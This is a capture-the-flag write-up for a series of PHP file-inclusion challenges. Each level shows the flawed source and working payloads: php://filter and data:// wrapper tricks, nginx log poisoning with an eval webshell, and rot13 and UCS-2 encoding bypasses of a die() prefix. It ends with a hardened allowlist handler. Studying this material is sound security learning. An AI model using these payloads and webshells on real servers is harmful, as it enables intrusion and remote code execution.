web78
<?php
// Challenge source: the raw GET parameter reaches include() with no check at all.
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}
Payload: ?file=php://filter/convert.base64-encode/resource=flag.php (the filter wrapper returns the base64-encoded source of flag.php instead of executing it)
web79
<?php
// Challenge source: only the literal substring "php" is replaced, so other stream
// wrappers (data://) and short tags (<?=) still reach include() untouched.
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
Three working payloads (the data:// wrapper carries the PHP source itself, and neither base64 encoding nor the <?= short tag contains the filtered string "php"):
1. ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTs/Pg==
   (decoded base64: <?php system('tac flag.php');?>)
2. ?file=data://text/plain,<?=eval($_POST[1]);?>  with POST body 1=system("tac flag.php");
3. ?file=data://text/plain,<?= eval($_GET[1]);?>,&1=system("tac flag.php");
web80
<?php
// Challenge source: "php" and "data" are both replaced, which blocks the data://
// payloads, but a plain local path (for example a web server log) is still included.
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
The data pseudo-protocol is now replaced, so the previous solution no longer works.
Solve it by including the web server log file (log poisoning):
Log file path: ?file=/var/log/nginx/access.log
Modify the request header: User-Agent: <?php eval($_POST[1]);?>
POST: 1=system('ls'); // reveals the flag file name fl0g.php
POST: 1=system('tac fl0g.php'); // gets the flag
web81
<?php
// Challenge source: ":" is replaced as well, so every scheme-based wrapper is
// blocked; the filter only applies to $file, not to what is written into the log.
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
Solve it by including the web server log file (log poisoning):
Log file path: ?file=/var/log/nginx/access.log
Modify the request header: User-Agent: <?= eval($_POST[1]);?>
POST: 1=system('ls'); // reveals the flag file name fl0g.php
POST: 1=system('tac fl0g.php'); // gets the flag
web82
web87
<?php
// Challenge source: the path is blacklisted and then urldecode()d, and a die()
// stub is prepended to whatever is written, so a plain webshell never executes.
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
    highlight_file(__FILE__);
}
1. URL-encode /?file=php://filter/write=string.rot13/resource=1.php twice (PHP decodes the query string once on receipt and the script calls urldecode() once more, so the literal "php", ":" and "." only appear after the str_replace() calls have run):
?file=%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%37%33%25%37%34%25%37%32%25%36%39%25%36%45%25%36%37%25%32%45%25%37%32%25%36%46%25%37%34%25%33%31%25%33%33%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%31%25%32%45%25%37%30%25%36%38%25%37%30
2. ROT13-encode the POST body content=<?php system('tac f*.php');?>; the write filter rotates the whole file, so the prepended die() stub becomes <?cuc qvr(...);?>, which PHP no longer treats as code, while the pre-rotated payload turns back into valid PHP:
content=<?cuc flfgrz('gnp s*.cuc');?>
3. Visit url/1.php to get the flag.
[Further reading]
2. file_put_content和死亡·杂糅代码之缘 - 先知社区 ("file_put_content and the die() prefix / mixed-code trick", Xianzhi community)
web88
<?php
// Challenge source: a regex blacklist rejects "php" and most punctuation, but
// the characters used by data://text/plain;base64,<payload> are all still allowed.
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}
Base64-encode the payload so that none of the filtered characters appear in the file parameter. The payload to encode is <?php system('tac f*.php');
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7
After base64 encoding, strip the trailing "=" padding (it is filtered); the decoder accepts the unpadded string.
web116
Opening the page shows a video player. Download the video and open it in 010 Editor: a PNG file is embedded in it. Save the PNG out to get the image below.
payload: ?file=flag.php
Capture the request in Burp, send it to Repeater and click Go to get the flag.
web117
<?php
// Challenge source: the blacklist now also covers rot13, base64, string and the
// common wrappers, but convert.iconv.* filters are not on the list.
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);
payload:
?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
POST: contents=?<hp pvela$(P_SO[T]1;)>?
The UCS-2LE to UCS-2BE conversion swaps every pair of bytes in the written data. The 14-byte prefix <?php die();?> becomes ?<hp pid(e;)>? and is no longer a PHP tag, while the pre-swapped payload above turns back into <?php eval($_POST[1]);?>.
Visit /a.php with POST 1=system('tac fl*.php'); to get the flag.
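Every challenge above is beaten the same way: a blacklist (str_replace or preg_match) is applied to a path that the request controls and that still reaches include() or file_put_contents(). The following hardened handler is an added example, not the challenge code; it assumes the includable pages live in a ./pages/ directory and replaces the blacklist with an allowlist keyed by a short name, so no wrapper, encoded variant or log path is ever interpreted as a file.

```php
<?php
// Added example, not part of the challenge source. Maps a request key to a known
// file under ./pages/ (assumed layout) so the raw parameter never reaches include().
declare(strict_types=1);

const PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

function resolve_page(string $key): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;                        // unknown key: refuse instead of guessing
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath(__DIR__ . '/pages/' . PAGES[$key]);
    // realpath() resolves symlinks and "..", and returns false for stream wrappers
    // and missing files; additionally require the result to stay under $base.
    if ($base === false || $path === false || !is_file($path)
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page((string)($_GET['file'] ?? 'home'));
if ($page === null) {
    http_response_code(404);
    exit('not found');
}
include $page;
```

Setting allow_url_include=Off stops data:// and http:// includes but does nothing against php://filter or a local log file, which is why the control has to be an allowlist rather than a longer blacklist; for the file_put_contents() challenges (web87, web117) the equivalent rule is to never let the request choose the destination path at all.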